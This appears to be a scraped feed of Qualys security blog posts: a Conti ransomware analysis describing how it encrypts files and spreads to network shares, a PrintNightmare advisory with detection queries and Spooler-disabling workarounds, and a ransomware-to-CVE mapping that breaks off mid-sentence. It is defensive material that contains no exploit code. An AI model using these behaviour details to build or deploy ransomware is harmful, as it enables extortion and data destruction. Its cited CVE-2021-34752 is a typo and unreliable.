Fig. 8, Conti uses multi-threaded tactics. It calls `CreateIoCompletionPort` API to create multiple instances of worker threads into memory to wait for data. Once the file listing is completed, it is passed to the worker threads. Utilizing the computing power of multi-core CPUs, the data is quickly encrypted:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-8-Implementation-of-Multi-threaded-Processing-1.png)Fig. 8 Implementation of Multi-threaded Processing ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-9-Multiple-Threads-Perform-File-Encryption.png)Fig. 9 Multiple Threads Perform File Encryption\n\nConti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-10-Getting-Info-of-Remote-Shares.png)Fig. 10 Getting Info of Remote Shares\n\nIt collects ARP cache information from the local system using the `GetIpNetTable` API. ARP cache information is a list of all the systems with which the computer recently communicated. It checks for "172.", "192.168." etc., on the collected IP list. If an IP address is in a different range it skips that system from encryption:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-11-Collect-ARP-Cache-Information.png)Fig. 11 Collect ARP Cache Information\n\nIt uses an AES-256 encryption key per file with a hard-codedRAS-4096 public encryption key. As shown in Fig. 12, the 0x6610 parameter is used while calling the `CryptGenKey` API. 0x6610 is the value of the CALG_AES_256 identifier and is only alg_id:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-12-Create-CALG_AES_256-Key.png)Fig. 12 Create CALG_AES_256 Key\n\nConti has a unique feature that allows attackers to perform file encryption in command line mode:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-13-Command-Line-Mode-of-Operation.png)Fig. 13 Command Line Mode of Operation\n\n### Modes of Operation\n\nConti allows 2 command line modes`--encrypt-mode` and `- h`:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-14-Command-Line-encrypt-mode-Mode.png)Fig. 14 Command Line `--encrypt-mode` Mode\n\n`--encrypt-mod` marks which files are encrypted. There are 3 options for its value:`all`, `local`, and `network`. By default, ransomware runs with the `all` parameter:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-15-Command-Line-encrypt-mode-with-Value-all.png)Fig. 15 Command Line `--encrypt-mode` with Value `all`\n\nIn` all`, encryption carried out for - local and network. `network` means that shared resources on the local network will be encrypted:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-16-Command-Line-encrypt-mode-Mode-with-Value-local.png)Fig. 16 Command Line `--encrypt-mode` Mode with Value `local` ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-17-Command-Line-encrypt-mode-Mode-with-Value-network.png)Fig. 17 Command Line `--encrypt-mode` Mode with Value `network`\n\nIn command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-18-Folders-Ignored-in-Encryption.png)Fig. 18 Folders Ignored in Encryption\n\nIt skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-19-__CONTI-Extension-Appended-to-Files.png)Fig. 19 __CONTI\u201d Extension Appended to Files\n\n### The Ransom Note:\n\nThe ransom note and the note\u2019s file information are present in the resource of malware files:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-20-Ransom-Note-Content.png)Fig. 20 Ransom Note Content ![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-21-Ransom-Note-Name.png)Fig. 21 Ransom Note Name\n\nIt calls the `LoadResource` API to get ransom note-related information:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-22-Code-to-Collect-Data-Related-to-the-Ransom-Note.png)Fig. 22 Code to Collect Data Related to the Ransom Note\n\nThe ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Fig.-23-Ransom-Note.png)Fig. 23 Ransom Note\n\n### IoC:\n \n \n eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe\n\n### TTP Map:\n\nInitial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact \n---|---|---|---|---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) \nPhishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) \nPhishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) \nExploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | \n| Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL (T1547.004)| | | | Network Share Discovery (T1135)| | | | | \n| Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | \n| | | | | | Network Service Scanning (T1046)| | | | | \n| | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | \n| | | | | | System information discovery (T1082)| | | | | \n| | | | | | System owner/user discovery (T1033)| | | | | \n| | | | | | Security software discovery (T1063)| | | | | \n| | | | | | Account Discovery: Local Account (T1087.001)| | | | | \n| | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | \n| | | | | | | | | | | \n \n### Summary\n\nTo defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-18T17:17:56", "type": "qualysblog", "title": "Conti Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-11-18T17:17:56", "id": "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:25", "description": "**Update July 9, 2021**: Added "Registry Settings Check After Installing the Updates" section below.\n\n**Original Post**: On June 29, 2021, a zero-day exploit was observed on Microsoft Windows systems which allows authenticated users with a regular Domain User account to gain full SYSTEM-level privileges. On July 1, 2021, Microsoft released a separate [advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) linking this zero-day to CVE-2021-34527 as a confirmed Remote Code Execution (RCE) vulnerability. According to the new advisory, the PoC is publicly disclosed and actively exploited in the wild.\n\nOn July 6, 2021, [Microsoft released patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to address the PrintNightmare zero-day vulnerabilities.\n\nOn July 7, 2021, after Microsoft patches were released, some security researchers found that these were incomplete patches and threat actors could still leverage local privilege escalation vulnerability to gain access to the system.\n\nPer [BleepingComputer news](<https://www.bleepingcomputer.com/news/microsoft/microsofts-incomplete-printnightmare-patch-fails-to-fix-vulnerability/>), \u201cAfter update was released, security researchers [Matthew Hickey](<https://twitter.com/hackerfantastic/status/1410100394492112898>), co-founder of Hacker House, and [Will Dormann](<https://twitter.com/wdormann>), a vulnerability analyst for CERT/CC, determined that Microsoft only fixed the remote code execution component of the vulnerability. However, malware and threat actors could still use the local privilege escalation component to gain SYSTEM privileges on vulnerable systems for older Windows versions, and for newer versions if the Point and Print policy was enabled.\u201d\n\n#### About PrintNightmare\n\nPrintNightmare (CVE-2021-34527) is a vulnerability that allows an attacker with a regular user account to take over a server running the Windows Print Spooler service. This service runs on all Windows servers and clients by default, including domain controllers, in an Active Directory environment. Print Spooler, which is enabled by default on Microsoft Windows, is an executable file that manages print jobs sent to the computer printer or print server.\n\nA team of security researchers from Sangfor discovered this zero-day vulnerability. In a tweet they wrote, \n\n> \u201cWe deleted the POC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service. For more RCE and LPE in Spooler, stay tuned and wait our Blackhat talk.\u201d \n\nThe GitHub repository was taken offline after a few hours, but not before it was [cloned](<https://github.com/cube0x0/CVE-2021-1675>) by several other users.\n\n_PrintNightmare_ execution looks for _kernelbase.dll, unidrv.dll_ files along with any other DLLs written into subfolders of "_C:WindowsSystem32spooldrivers"_ in the same timeframe by _spoolsv.exe_. A hard-coded printer driver path is not required as one can use _EnumPrinterDrivers()_ to find the path for _unidrv.dll._\n\n#### Affected Products\n\nAll Windows servers and clients, including domain controllers.\n\n### Identify Assets, Discover, Prioritize and Remediate Using Qualys VMDR\u00ae\n\nUse [Qualys Vulnerability Management, Detection, and Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) for:\n\n * Identification of known and unknown hosts running vulnerable Windows servers with Print Spooler service\n * Automatic detection of vulnerabilities and misconfigurations for Windows systems\n * Prioritization of threats based on risk\n * Integrated patch deployment\n\n#### Identification of Windows Assets with Print Spooler Running__\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of windows server hosts with Print Spooler service running\n\n`operatingSystem.category1:`Windows` and services.name:`Spooler``\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/GAI-1070x230.png)\n\nOnce the hosts are identified, they can be grouped together with a dynamic tag, e.g. "PrintNightmare\u201d. This helps in automatically grouping existing Windows hosts with the PrintNightmare vulnerability as well as any new host that spins up with this vulnerability. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Discover PrintNightmare CVE-2021-34527 Vulnerability __\n\nNow that the Windows hosts with PrintNightmare are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like PrintNightmare based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018PrintNightmare\u2019 asset tag in the vulnerabilities view by using QQL query:\n\n`vulnerabilities.vulnerability.qid: `91785``\n\nThis will return a list of all impacted hosts.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/QID-PrintSpooler-1-1070x564.png)\n\nQID 91785 is available in signature version VULNSIGS-2.5.226-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.226.3-2 and above.\n\nAlong with the QID 91785, Qualys released the following IG QID 45498 to help customers identify if Print Spooler service is running on Windows systems. This QID can be detected using authenticated scanning using VULNSIGS- 2.5.223-3 and above or the Qualys Cloud Agent manifest version 2.5.223.3-2 and above.\n\n`QID 45498: Microsoft Windows Print Spooler Service is Running`\n\n**Update July 8, 2021**: Qualys released QID 91786 to address the Zero Day. In addition, IG QID is released to identify if Point and Print restrictions are enabled. These QIDs can be detected using authenticated scanning using VULNSIGS- 2.5.228-3 and above or the Qualys Cloud Agent manifest version 2.5.228.3-2 and above. \n\n`QID 91786 Microsoft Windows Print Spooler Point and Print Insecure Configuration Detected (PrintNightmare) `\n\n`QID 45499 Point and Print Restrictions NoWarningNoElevationOnInstall Is Enabled`\n\nUsing VMDR, the PrintNightmare vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Public Exploit\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n * Unauthenticated_Exploitation\n![](https://blog.qualys.com/wp-content/uploads/2021/07/VMDR-prioritization-1070x510.png)\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/TP-1070x694.png)\n\nSimply click on the impacted assets for the PrintNightmare threat feed to see the vulnerability and impacted host details.\n\n#### Dashboard\n\nWith VMDR Dashboard, you can track PrintNightmare, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of PrintNightmare vulnerability trends in your environment with the [PrintSpooler RCE (PrintNightmare) dashboard](<https://qualys-secure.force.com/customer/s/article/000006719>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/printnightmare-dashboard-1070x786.png)\n\n#### Response by Patching and Remediation\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply search based on `qid:91785` in the Patch Tab and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 PrintNightmare.\n\nFor proactive, continuous patching, you can create a daily job with a 24-hour patch window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/qid91758-1-1070x602.png)\n\n#### Identify and Address System Misconfigurations\n\nTo reduce the overall security risk, it is important to take care of Windows system misconfigurations as well. Qualys VMDR shows your Windows system misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have the PrintNightmare vulnerability. \n\nWith the [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover the status of the \u2018Print Spooler\u2019 service and if they have misconfigurations in context to the PrintNightmare vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/eight-controls-1070x473.png)\n\nQualys configuration ID \u2013 1368 \u201cStatus of the \u2018Print Spooler\u2019 service\u201d \n\u201d would be evaluated against all Windows systems as shown below\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/1368-pass-1070x442.png)\n\n21711 Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting would be evaluated as shown below\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/21711-pass-1-1070x468.png)\n\n#### Registry Settings Check After Installing the Updates\n\nAs reported in the [Microsoft advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) on July 7, 2021: In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct.\n\n * HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n * NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)\n * UpdatePromptSettings = 0 (DWORD) or not defined (default setting)\n\nQualys Policy Compliance customers can evaluate the settings by the following two controls:\n\n19070 Status of the \u2018Point and Print Restrictions: When installing drivers for a new connection\u2019 setting\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/19070-success-1070x462.png)\n\n19071 Status of the \u2018Point and Print Restrictions: When updating drivers for an existing connection\u2019 setting\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/19071-success-1070x475.png)\n\n### Workaround\n\nUsers are urged to disable the \u201cPrint Spooler\u201d service on servers that do not require it. Microsoft has provided a series of [workarounds](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to be applied.\n\nDetermine if the Print Spooler service is running (run as a Domain Admin)\n\nRun the following as a Domain Admin: \n`Get-Service -Name Spooler`\n\nIf the Print Spooler is running or if the service is not set to disabled, select one of the following options to either disable the Print Spooler service, or to Disable inbound remote printing through Group Policy:\n\n##### **Option 1** \u2013 Disable the Print Spooler service\n\nIf disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands: \n`Stop-Service -Name Spooler -Force \nSet-Service -Name Spooler -StartupType Disabled` \n \n**Impact of workaround**: Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n##### **Option 2** \u2013 Disable inbound remote printing through Group Policy\n\nYou can also configure the settings via Group Policy as follows: \n_Computer Configuration / Administrative Templates / Printers_ \nDisable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks. \n \n**Impact of workaround:** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nPer the above two options, Qualys Policy Compliance customers can do evaluation by the following two controls:\n\n * 1368 Status of the \u2018Print Spooler\u2019 service\u201d\n * 21711 Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical PrintNightmare vulnerability CVE-2021-34752.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T23:30:23", "type": "qualysblog", "title": "Microsoft Windows Print Spooler RCE Vulnerability (PrintNightmare-CVE-2021-34527) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-34752"], "modified": "2021-07-07T23:30:23", "id": "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-05T16:35:26", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. \n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university's network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. \n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture1.png)\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment & remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/qualys-ransomware-screenshot-1-1070x795.png)\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment & Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets & monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture1.png)\n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture2.png)\n\n### Continuous detection & prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture2.png)\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say 